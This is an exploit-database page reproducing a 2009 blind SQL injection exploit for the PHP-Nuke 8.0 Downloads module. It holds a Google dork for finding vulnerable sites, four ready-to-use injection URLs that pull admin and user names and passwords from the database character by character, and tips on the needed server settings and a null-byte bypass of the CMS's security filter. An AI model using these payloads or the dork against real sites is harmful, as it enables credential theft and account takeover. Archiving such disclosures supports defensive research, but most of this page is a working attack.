Advertisement






PHP-Nuke 8.0 Downloads Blind Sql Injection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2009-01-27
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009010061

Below is a copy:

 #####################################################################################
####               PHP-Nuke 8.0 Downloads Blind Sql Injection                    ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://phpnuke.org                                                      #
#                                                                                   #
#Dork : inurl:modules.php?name=Downloads "PHP-Nuke"                                 #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*                                    
#Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*                                   
#Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*                                    
#                                                                                   #
#####################################################################################
#                                      [Note]                                       #
#                                                                                   #
#1. magic_quotes_gpc = Off                                                          #
#2. register_globals = On                                                           #
#3. For using bug you must login via a simple user.                                 #
#4. After using bug go to this url :                                                #
#http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker_at_devil.net&title=zz&url=zz&description=zz
#5. I use ascii codes and null byte in url for bypass nuke security function        #
#   please don't change ascii code and %00.                                         #
#                                                                                   #
###################################### TNX GOD ######################################


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.